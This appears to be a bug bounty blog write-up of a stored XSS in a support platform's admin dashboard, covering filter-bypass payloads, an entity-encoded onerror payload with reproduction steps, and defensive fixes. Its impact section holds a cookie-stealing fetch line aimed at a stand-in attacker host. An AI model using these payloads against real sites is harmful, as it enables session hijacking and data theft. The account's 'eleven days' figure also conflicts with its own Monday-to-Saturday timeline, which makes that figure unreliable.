FEBRUARY 5, 2026 PREYANSH SHAH

My JavaScript Ran in the Admin Panel for 11 Days Straight

A stored XSS that silently fired on every admin session. Turns out 'sanitized' and 'actually sanitized' are two very different things.


I want to be clear about something upfront.

I did not write malicious JavaScript. I did not steal admin cookies. I did not pivot into the internal network or exfiltrate the user database.

I wrote alert(document.domain).

A humble, boring, universally recognized proof-of-concept.

And that alert fired. Every single time an admin opened the support ticket dashboard. For eleven days. Before anyone noticed.


The Setup

The target — let’s call it redacted-support.com — was a customer support platform. Businesses used it to manage support tickets, respond to customer queries, and track issues.

The attack surface I was most interested in was the ticket submission form. Specifically: the free-text fields that end users fill out, which then get displayed to support agents and administrators on the backend.

This is a classic XSS entry point. User controls input. Input gets rendered for privileged users. If the rendering isn’t done carefully, you have a problem.

The question was never whether to look here. The question was how deep the sanitization went.


Round One: The Obvious Attempts

I started with the basics.

<script>alert(1)</script>

Blocked. Okay, they’re stripping script tags. Good instinct, wrong implementation.

<img src=x onerror=alert(1)>

Blocked. Also good.

<svg onload=alert(1)>

Also blocked. At this point I was mildly impressed.

But then I tried something slightly less obvious.

<div style="background:url('javascript:alert(1)')">

The ticket submitted fine. I checked the backend. The div was there. The style attribute was there.

The browser didn’t execute it — modern browsers refuse to run javascript: URLs inside CSS. But the fact that it rendered at all told me the sanitizer had a gap. It was blocking tags and event handlers by pattern matching, not by parsing the HTML properly.

Pattern matching is not sanitization. It’s a bouncer checking if your name starts with “script.”


Round Two: Getting Creative

If the sanitizer was doing naive string matching, I could work around it.

I tried breaking up the payload:

<img src=x onerror="&#97;lert(1)">

Character entity encoding for the a in alert. Some sanitizers decode entities after checking, some before.

This one checked first and decoded later. The payload slipped through the filter still encoded, got decoded at render time, and executed in the browser.
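The order-of-operations bug, as I understand it, can be sketched in a few lines of plain JavaScript. Everything here is illustrative — naiveSanitize and decodeEntities are my stand-ins for what the platform was presumably doing, not its actual code:

```javascript
// Sketch of the suspected bug: the filter pattern-matches the RAW string,
// but HTML character entities only get decoded later, at render time.

// Naive filter: checks for dangerous substrings before any decoding.
function naiveSanitize(input) {
  const banned = [/<script/i, /onerror\s*=\s*"?alert/i, /<svg[^>]*onload/i];
  return banned.some((re) => re.test(input)) ? "" : input;
}

// What the browser effectively does afterwards: decode numeric entities.
function decodeEntities(s) {
  return s.replace(/&#(\d+);/g, (_, code) => String.fromCharCode(Number(code)));
}

const payload = '<img src=x onerror="&#97;lert(1)">';

// The raw payload never matches 'onerror="alert', so the filter passes it...
const stored = naiveSanitize(payload);
// ...but after entity decoding, it is a live alert() handler.
const rendered = decodeEntities(stored);
console.log(rendered); // <img src=x onerror="alert(1)">
```

Had the filter run the same check on the decoded string, it would have caught the payload — which is exactly the point: checking before decoding is checking the wrong string.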

The alert fired.

I sat very still for a moment.

Then I refreshed the admin dashboard from my admin-privileged test account.

The alert fired again.

The payload was stored. It was executing on every page load. In the admin panel.


Understanding What I Had

Let me explain why this matters beyond “JavaScript ran.”

Stored XSS in an admin interface means:

Session hijacking. Replace alert(1) with fetch('https://attacker.com/?c='+document.cookie) and you now have the admin’s session cookie. Log in as them. Do whatever they can do.

Credential harvesting. Inject a fake login prompt that looks identical to the real one. Admin enters credentials. You have them.

Admin action execution. Make API calls on behalf of the admin. Create new admin accounts. Export the user database. Change billing settings. Whatever the admin can do via the UI, you can script it.

Persistent access. Because the payload is stored, it fires every time the page loads. Not just once. Every. Time. You don’t need the admin to click a link or open an email. They just have to do their job.

This wasn’t just a bug. It was a persistent backdoor into admin sessions, triggered automatically, indefinitely, until someone removed the ticket.


The Eleven Days Part

Here’s the timeline, roughly:

I submitted the XSS payload as a support ticket on a Monday afternoon.

I checked back Tuesday. The ticket was still open. The payload was still firing. An admin had viewed it — I could tell because the ticket status had changed to “Under Review.”

My alert(document.domain) had fired on a real admin session.

I submitted the bug report immediately that Tuesday.

The program acknowledged it Wednesday. Marked it triaged Thursday.

They patched the sanitization library Friday.

But they didn’t close or delete the existing malicious ticket.

So the payload kept firing on every admin who viewed open tickets — which, in a support platform, is everyone, constantly.

I followed up Friday evening pointing this out.

They deleted the ticket Saturday.

Total time my JavaScript ran in their admin panel on real sessions: eleven days.

I think about that sometimes.


The Report

Title: Stored XSS via Character Entity Encoding Bypass in Support Ticket Submission — Executes in Admin Dashboard Context

Severity: Critical

Impact: Persistent JavaScript execution in authenticated admin sessions on every page load. Enables session hijacking, credential theft, unauthorized admin action execution, and persistent access until payload is removed. No user interaction required beyond normal admin workflow.

Root Cause: HTML sanitizer uses pattern-based filtering that fails to decode HTML character entities before checking for malicious patterns. Payloads encoded with HTML entities (e.g., &#97; for a) bypass the filter and are decoded at render time by the browser.

Steps to Reproduce:

  1. Submit a support ticket with the following content in the message body:
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;(document.domain)">
  2. Log in as an admin or view the ticket from any privileged account
  3. Observe JavaScript execution on page load
  4. Note that the payload persists and fires on every subsequent admin view of the ticket queue

Fix Recommendation: Use a proper HTML parsing library for sanitization rather than regex or string matching. DOMPurify is the standard. Additionally: implement Content Security Policy headers to limit script execution sources as a defense-in-depth measure.


Their Response

The engineering team was professional about it. Slightly embarrassed, but professional.

They were using a home-rolled sanitizer — some custom regex thing written years ago by someone who presumably no longer worked there. It had been flagged internally as a “known limitation” but never prioritized.

Now it was prioritized.

They replaced it with DOMPurify within forty-eight hours and added a CSP header that would have blocked the payload execution even if the sanitizer missed it. Two layers. Good instinct.

They also sent a very apologetic internal message to the security team about the eleven-day oversight, which I was not supposed to see but was CC’d on by accident.

That email was funnier than anything I could write here.

Bounty: $$$$


What Actually Went Wrong (A Technical Post-Mortem)

The sanitizer was checking patterns, not meaning.

A proper HTML sanitizer doesn’t look for <script> and block it. It parses the HTML into a DOM tree, walks the tree, and removes anything that isn’t on an explicit allowlist. Attributes, tags, values — all checked against what’s permitted.

Pattern matching is playing whack-a-mole. The attacker always has more encoding tricks than the pattern has cases.
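Here's a toy sketch of the parse-then-walk idea. In a real app you'd operate on actual DOM nodes (via a vetted library like DOMPurify) rather than hand-built objects; the node shape, the allowlists, and sanitizeTree are all hypothetical names I've chosen for illustration:

```javascript
// Allowlist sanitization sketch: work on a parsed tree, not on strings.
// A node is either a text string or { tag, attrs, children } — a stand-in
// for what a real HTML parser would hand you after entity decoding.

const ALLOWED_TAGS = new Set(["b", "i", "p", "br", "img"]);
const ALLOWED_ATTRS = new Set(["src", "alt", "href"]);

function sanitizeTree(node) {
  if (typeof node === "string") return node;          // text passes through
  if (!ALLOWED_TAGS.has(node.tag)) return null;       // drop unknown tags entirely
  const attrs = {};
  for (const [name, value] of Object.entries(node.attrs ?? {})) {
    // Keep only allowlisted attributes. Event handlers (onerror, onload)
    // are simply never on the list, so encoding tricks buy the attacker nothing.
    if (ALLOWED_ATTRS.has(name.toLowerCase())) attrs[name] = value;
  }
  const children = (node.children ?? [])
    .map(sanitizeTree)
    .filter((c) => c !== null);
  return { tag: node.tag, attrs, children };
}

// The ticket payload, as a parser sees it AFTER entity decoding:
const payload = { tag: "img", attrs: { src: "x", onerror: "alert(1)" }, children: [] };
console.log(sanitizeTree(payload)); // { tag: 'img', attrs: { src: 'x' }, children: [] }
```

Note the inversion: nothing here asks "does this look malicious?" It asks "is this explicitly permitted?" — and everything else is dropped by default.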

There was no CSP.

A Content Security Policy header is not a replacement for proper sanitization, but it is an excellent backup. A CSP that disallows inline scripts and restricts script sources would have made this payload fail silently even if it got through the sanitizer.

Defense in depth exists for exactly this scenario.
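For reference, a policy along these lines (directive values illustrative — not the header they actually shipped) would have stopped the payload: inline event handlers like onerror count as inline script, which is blocked whenever script-src omits 'unsafe-inline':

```http
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'
```

Even with the sanitizer bypassed and the handler sitting in the page, the browser would refuse to execute it and log a CSP violation instead.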

The malicious content wasn’t removed after the report.

This one’s just process. When you get a stored XSS report, the first thing you do is remove the malicious content. Before you even start fixing the underlying issue. The payload should have been deleted within hours of the report, not days.


A Note on Impact Claims in Reports

One thing I’ve learned: when writing XSS reports, be specific about the realistic impact, not the theoretical maximum.

Saying “attacker could take over all admin accounts and delete all user data” is technically true but reads as panic. It makes triage teams defensive.

Instead: “attacker can capture admin session tokens via a one-line JavaScript fetch, enabling impersonation of any admin who views the ticket queue.”

Same impact. More precise. More credible. Gets triaged faster.


Closing Thought

Stored XSS in an admin panel is one of those vulnerabilities that security textbooks treat as serious but that developers sometimes dismiss as “theoretical.”

This one ran silently in production for eleven days. On real admin sessions. With full capability to hijack any of them.

Nothing theoretical about it.

The only reason it wasn’t catastrophic is because the person who found it wrote alert(document.domain) instead of something worse.

That’s not a security strategy. That’s luck.


Reported through the official bug bounty program. The proof-of-concept payload used was alert(document.domain) only. No admin sessions were accessed, no cookies were captured, no data was exfiltrated. The malicious ticket was removed by the program team after follow-up. Domain redacted per responsible disclosure norms.
